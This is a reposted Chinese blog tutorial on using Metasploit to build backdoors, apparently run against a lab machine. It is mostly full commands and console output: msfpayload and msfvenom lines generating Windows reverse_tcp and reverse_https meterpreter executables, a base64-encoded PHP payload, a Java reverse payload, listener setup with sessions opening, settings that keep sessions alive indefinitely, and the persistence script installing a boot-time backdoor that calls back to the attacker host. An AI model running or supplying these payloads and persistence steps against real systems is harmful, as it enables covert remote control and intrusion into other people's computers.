标签:Metasploit 后门 5.5 5.1 exploit handler msf 执行 meterpreter
目录
他能生成LINUX WINDOWS PHP ASP JSP等等的后门哦
msfpayload as shellcode
查看全部列表 目前有:248 蛋
root@kali:/home/brk# msfpayload -l
他能生成多种多样的
简单的来说一个
正常的Windows后门
:用的是:windows/meterpreter/reverse_tcp
msfpayload windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=8080 R | \
msfencode -b '' -t exe -o /var/www/meterpreter.exe
生成以后让目标运行 我们需要进行监听,或者SHELL
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 5.5.5.1
LHOST => 5.5.5.1
msf exploit(handler) > set LPORT 8080
LPORT => 8080
msf exploit(handler) > exploit
[*] Started reverse handler on 5.5.5.1:8080
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 5.5.5.3
[*] Meterpreter session 1 opened (5.5.5.1:8080 -> 5.5.5.3:1055) at 2020-03-21 23:26:58 +0800
meterpreter >其他(php asp jsp dll)
选中你的msfpayload名字,生成,你动的 例如:
Dll:
php:
msf payload(bind_php) > generate -t raw -e php/base64
eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK));JAVA:
./msfpayload java/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=4444 W > /tmp/job.jar
不正常的Windows后门
说到正常的肯定有不正常的 例如:reverse_https reverse_http
大家都晓得 这东西秒杀防火墙的,在生成的过程中,党意外中断的链接我们可以再继续链接,就像灰鸽子一样,默认是5分钟,你可以设置SessionExpirationTimeout选项为0,代表链接永远不会过期。
brk@Dis9Team:~$ sudo msfvenom -p windows/meterpreter/reverse_https -f exe LHOST=5.5.5.1 LPORT=1111 > https.exe
brk@Dis9Team:~$ file https.exe
https.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit现在我们来运行他。
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST 5.5.5.1
LHOST => 5.5.5.1
msf exploit(handler) > set LPORT 1111
LPORT => 1111
msf exploit(handler) > set SessionCommunicationTimeout 0
SessionCommunicationTimeout => 0
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started HTTPS reverse handler on https://5.5.5.1:1111/
msf exploit(handler) > [*] Starting the payload handler...
[*] 5.5.5.3:1060 Request received for /AauE...
[*] 5.5.5.3:1060 Staging connection for target /AauE received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 2 opened (5.5.5.1:1111 -> 5.5.5.3:1060) at 2020-03-21 23:40:06 +0800成功了,多点了一下 两个SHELL 我们吧SHELL绘画删除了
msf exploit(handler) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
2 meterpreter x86/win32 DIS9TEAM-A1\brk @ DIS9TEAM-A1 5.5.5.1:1111 -> 5.5.5.3:1060 (5.5.5.3)
3 meterpreter x86/win32 DIS9TEAM-A1\brk @ DIS9TEAM-A1 5.5.5.1:1111 -> 5.5.5.3:1118 (5.5.5.3)
msf exploit(handler) > sessions -k 2
[*] Killing session 2
[*] Meterpreter session 2 closed.
msf exploit(handler) > sessions -k 3
[*] Killing session 3
[*] Meterpreter session 3 closed.
msf exploit(handler) > sessions
Active sessions
===============
No active sessions.
msf exploit(handler) >继续监听:
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started HTTPS reverse handler on https://5.5.5.1:1111/
[*] Starting the payload handler...
msf exploit(handler) > [*] 5.5.5.3:1280 Request received for /AauE...
[*] 5.5.5.3:1280 Staging connection for target /AauE received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 4 opened (5.5.5.1:1111 -> 5.5.5.3:1280) at 2012-03-21 23:45:57 +0800继续获得了SHELL
persistence
这货是POST EXPLOITS模块的,前提你要有SHELL绘画,创建持续的后门,作为系统服务器启动
先来链接SHELL,查看帮助先:
msf exploit(handler) > sessions -i 4
meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.
OPTIONS:
-A Automatically start a matching multi/handler to connect to the agent
-L Location in target host where to write payload to, if none %TEMP% will be used.
-P Payload to use, default is windows/meterpreter/reverse_tcp.
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T Alternate executable template to use
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i The interval in seconds between each connection attempt
-p The port on the remote host where Metasploit is listening
-r The IP of the system running Metasploit listening for the connect back
meterpreter >下面我们来运行:
meterpreter > run persistence -A -L c:\\windows\\ -x -i 5 -p 1234 -r 5.5.5.1
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=1234
[*] Persistent agent script is 609512 bytes long
[+] Persistent Script written to c:\windows\\FBEzRzQYpXKFg.vbs
[*] Starting connection handler at port 1234 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Executing script c:\windows\\FBEzRzQYpXKFg.vbs
[+] Agent executed with PID 3280
meterpreter >
安装到了 c:\windows 每隔5秒监听端口1234,本机是5.5.5.1
标签:Metasploit,后门,5.5,5.1,exploit,handler,msf,执行,meterpreter 来源: https://blog.csdn.net/wuguojiuai/article/details/118075758
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。